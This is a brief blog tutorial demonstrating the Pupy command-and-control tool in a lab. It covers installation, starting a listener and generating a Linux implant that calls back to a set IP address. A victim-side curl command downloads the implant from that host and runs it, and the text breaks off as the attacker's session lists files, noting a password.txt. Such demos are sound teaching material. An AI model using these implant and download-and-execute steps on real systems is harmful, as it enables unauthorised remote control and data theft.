[Offensive Security] Command and Control with Pupy!!
3 min readJan 16, 2022
--
What is Pupy?
Pupy is an open-source remote admin and post-exploitation tool written in python. Pupy executes in memory, allowing it to leave a low footprint. Pupy also offers multiple communications channel options to make traffic.
MITRE ATT&CK
- initial access
- execution
- persistence
- privillege escalation
- defense evasion
- credential access
- discovery
- lateral movement
- collection
- command & control
- exfilltration
- impact
DEMO
Installation
To install pupy execute the following commands one by one :
git clone https://github.com/n1nj4sec/pupyNow download all the requirements using pip like the following command :
cd pupy
pip install -r requirements.txtNow run pupy using the following command :
./pupysh.pyEstablish a new session
Pupy Server: Main Terminal
config list
- This command shows all configurations, including the [listeners].
listen -a rsa
gen --output output/linux.ln --output-dir /project --debug -f client -O linux -A x64 connect --host 172.31.24.230:9091 -t rsa
Victim — Linux
curl --output $HOME/linux.ln http://172.31.24.230:8080/linux.lnchmod +x $HOME/linux.ln./linux.ln
After 60 seconds, the implant should connect to the Pupy server.
Pupy Server: Main Terminal
ls- Notice the password.txt within the…
![[AWS API Gateway, EKS] Access an Amazon EKS Cluster with an API Gateway!!](https://miro.medium.com/v2/resize:fit:1358/1*-w1mGhE3QuJemCBkS_B3Fw.png)
![[Splunk]How to capture log using Splunk Universal Forwarder](https://miro.medium.com/v2/resize:fit:1358/0*X-QInxolW5ienu77.png)
![[DevOps] Create your first CI/CD pipeline!!](https://miro.medium.com/v2/resize:fit:1358/1*XXbcbVCijb2DqX6SFHOlEA.png)
![[AWS security]How to query and analyze VPC flow logs in AWS](https://miro.medium.com/v2/resize:fit:1358/1*76gVKV1YukSaPF9pHfVGag.png)
